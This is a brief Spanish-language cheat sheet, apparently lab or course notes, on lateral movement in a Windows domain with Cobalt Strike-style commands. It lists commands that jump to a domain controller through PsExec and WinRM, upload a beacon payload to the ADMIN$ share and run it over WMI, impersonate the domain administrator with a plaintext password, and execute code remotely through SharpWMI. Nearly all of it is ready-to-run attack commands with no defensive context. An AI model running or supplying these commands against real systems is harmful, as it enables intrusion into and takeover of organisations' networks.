Windows Management Instrumentation (WMI)

Windows Management Instrumentation (WMI)

Crear un acceso con credenciales.

jump psexec DC01 smb_listener
jump winrm64 DC01 smb_listener

Ejecutar un comando en una maquina remotamente.

remote-exec winrm DC01 [command]
cd \\DC01\ADMIN$
upload c:\Tools\Payloads\smb_beacon_x64.exe
remote-exec wmi DC01 C:\Windows\smb_beacon_x64.exe
link DC01

CoInitializeSecurity

Si aparece el error CoInitializeSecurity already called al ejecutar los comandos.

make_token PAY\Administrator Qwerty123
remote-exec wmi DC01 calc

Podemos realizar lo siguiente usando SharpWMI.

execute-assembly C:\Tools\SharpWMI\SharpWMI\bin\Release\SharpWMI.exe action=exec computername=DC01 command="C:\Windows\System32\calc.exe"